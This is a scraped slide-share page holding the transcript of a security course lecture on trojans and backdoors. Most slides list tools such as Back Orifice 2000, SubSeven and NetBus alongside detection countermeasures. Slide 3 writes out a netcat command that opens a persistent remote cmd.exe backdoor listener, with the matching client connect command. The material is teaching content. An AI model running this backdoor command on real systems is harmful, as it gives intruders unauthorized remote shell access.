1 / 18

Week 6: Trojans and Backdoors

Week 6: Trojans and Backdoors. What is a Trojan Horse? Overt and Covert. Week 6: Trojans and Backdoors. Hacking Tool: QAZ Hacking Tool: Tini Hacking Tool: Netcat. Netcat in Action as Backdoor. Remote command prompt anyone?

marius
Download Presentation

Week 6: Trojans and Backdoors

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Week 6: Trojans and Backdoors • What is a Trojan Horse? • Overt and Covert

  2. Week 6: Trojans and Backdoors • Hacking Tool: QAZ • Hacking Tool: Tini • Hacking Tool: Netcat

  3. Netcat in Action as Backdoor • Remote command prompt anyone? • On a Windows NT server issue the following command in the directory that contains netcat: nc -l -p1234 -d -e cmd.exe –L • This –l puts netcat into listen mode, the -p1234 tells netcat to use port 1234, the –d allows netcat to run detached from the console, the –e cmd.exe tells netcat to execute the cmd.exe program when a connection is made, and the –L will restart Netcat with the same command line when the connection is terminated. • On the client system issue the following command: nc destination 1234 • This command causes netcat to connect to the server named destination on port 1234. Immediately you are given a console connection to the destination server. Be careful! To exit the remote console session type: exit • You will be returned to your own console and will be able to reconnect to the destination server because netcat was started on the destination server with the –L option.

  4. Week 6: Trojans and Backdoors • Hacking Tool: Donald Dick • Hacking Tool: SubSeven • Hacking Tool: BackOrifice 2000 • Back Oriffice Plug-ins

  5. Back Orifice 2000 Can be used as a Network Administrator to remotely configure its system. It can also be used as a Trojan/Backdoor by attackers. Can run on any filename, Uses TCP port 54320 and UDP 54321 by default but can use any other port. Can disguise itself as Explorer.exe. Can use Strong Encryption. Open Source. Countermeasure:BackOfficer Friendly (nfr.net/products/bof)

  6. Some BO2K Plugins • BOPeep- provides streaming video of the victim’s screen to attacker. • Encryption- Blowfish, CAST-256, IDEA, RC6 (stronger than most commercial systems) • BOSOCK32- Stealth capabilities using ICMP • STCPIO- stealth using encrypted flow between BO2K GUI and server.

  7. Week 6: Trojans and Backdoors • Hacking Tool: NetBus • Wrappers

  8. Week 6: Trojans and Backdoors • Hacking Tool: Graffiti • Hacking Tool: Silk Rope 2000 • Hacking Tool: EliteWrap • Hacking Tool: IconPlus

  9. Week 6: Trojans and Backdoors • Packaging Tool: Microsoft WordPad • Hacking Tool: Whack a Mole

  10. Week 6: Trojans and Backdoors • Trojan Construction Kit • BoSniffer • Hacking Tool: FireKiller 2000

  11. Week 6: Trojans and Backdoors • Covert Channels • ICMP Tunneling • Hacking Tool: Loki

  12. Week 6: Trojans and Backdoors • Reverse WWW Shell • Backdoor Countermeasures

  13. Week 6: Trojans and Backdoors • BO Startup and Registry Entries • NetBus Startup and Registry Keys

  14. Week 6: Trojans and Backdoors • Port Monitoring Tools • fPort (foundstone.com) • TCPView (http://www.sysinternals.com/ntw2k/source/tcpview.shtml) • Process Viewer

  15. Week 6: Trojans and Backdoors • Inzider - Tracks Processes and Ports (www.sans.org/y2k/finding.htm ) • Trojan Maker

  16. Week 6: Trojans and Backdoors • Hacking Tool: Hard Disk Killer • Man-in-the-Middle Attack • Hacking Tool: dsniff

  17. Week 6: Trojans and Backdoors • System File Verification • TripWire (tripwire.com, tripwire.org)

  18. Week 6: Trojans and Backdoors • Summary

More Related